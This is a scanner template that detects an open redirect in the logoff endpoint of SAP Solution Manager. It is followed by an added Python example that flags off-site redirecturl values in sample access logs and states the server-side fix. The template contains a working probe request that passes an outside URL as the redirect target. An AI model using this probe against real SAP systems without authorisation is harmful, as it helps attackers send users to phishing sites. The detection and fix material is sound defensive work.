Vulnerability Description
SAP Solution Manager contains an open redirect vulnerability via the logoff endpoint. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
id: sap-redirect

info:
  name: SAP Solution Manager - Open Redirect
  author: Gal Nagli
  severity: medium
  description: |-
    SAP Solution Manager contains an open redirect vulnerability via the logoff endpoint. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  created: 2024/04/15

rules:
  r0:
    request:
      method: GET
      path: /sap/public/bc/icf/logoff?redirecturl=https://example.com
    expression: |
      response.status == 302 &&
      (response.raw_header.bcontains(b'Location: https://www.example.com') || response.raw_header.bcontains(b'Location: https://example.com'))
expression: r0()
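For the defender's side, the following is an added example (not part of the template above, and not SAP's or the template author's code) that runs the same check the template relies on over web-server access logs: it flags logoff requests whose redirecturl parameter points outside an allow-list of trusted hosts. The log lines are constructed, and the allowed hostnames (solman.corp.example, sso.corp.example) are assumed placeholders.

```python
import re
from urllib.parse import urlparse, parse_qs

# Hostnames a logoff redirect may legitimately target (assumed, site-specific).
ALLOWED_REDIRECT_HOSTS = {"solman.corp.example", "sso.corp.example"}

# Constructed access-log lines in common log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Apr/2024:10:01:02 +0000] "GET /sap/public/bc/icf/logoff?redirecturl=https://solman.corp.example/sap/bc/gui HTTP/1.1" 302 0
10.0.0.9 - - [15/Apr/2024:10:01:07 +0000] "GET /sap/public/bc/icf/logoff?redirecturl=https://example.com HTTP/1.1" 302 0
10.0.0.9 - - [15/Apr/2024:10:01:09 +0000] "GET /sap/public/bc/icf/logoff?redirecturl=/sap/bc/gui HTTP/1.1" 302 0
10.0.0.9 - - [15/Apr/2024:10:01:11 +0000] "GET /sap/public/bc/icf/logoff?redirecturl=//example.com/x HTTP/1.1" 302 0
10.0.0.7 - - [15/Apr/2024:10:01:15 +0000] "GET /sap/bc/gui/sap/its/webgui HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_external_redirect(value: str) -> bool:
    """True when a redirecturl value would send the browser off the allowed hosts.
    Covers absolute URLs, scheme-relative '//host' forms and backslash variants."""
    v = value.strip().replace("\\", "/")
    parsed = urlparse(v)
    if parsed.scheme and parsed.scheme.lower() not in ("http", "https"):
        return True  # javascript:, data: and similar schemes are never acceptable
    if parsed.netloc:
        return (parsed.hostname or "").lower() not in ALLOWED_REDIRECT_HOSTS
    # Relative targets are fine only as a single-slash path on the same host.
    return not v.startswith("/") or v.startswith("//")

def find_open_redirects(log_text: str) -> list:
    """Return the logoff requests whose redirecturl points off-site."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if path != "/sap/public/bc/icf/logoff":
            continue
        for value in parse_qs(query).get("redirecturl", []):
            if is_external_redirect(value):
                hits.append({"src": m.group("src"), "ts": m.group("ts"),
                             "redirecturl": value, "status": m.group("status")})
    return hits

if __name__ == "__main__":
    for hit in find_open_redirects(SAMPLE_LOG):
        print(hit)
```

The same is_external_redirect check, applied server-side before the logoff handler issues its 302, is the fix: only same-host paths or allow-listed hosts may be used as a redirect target.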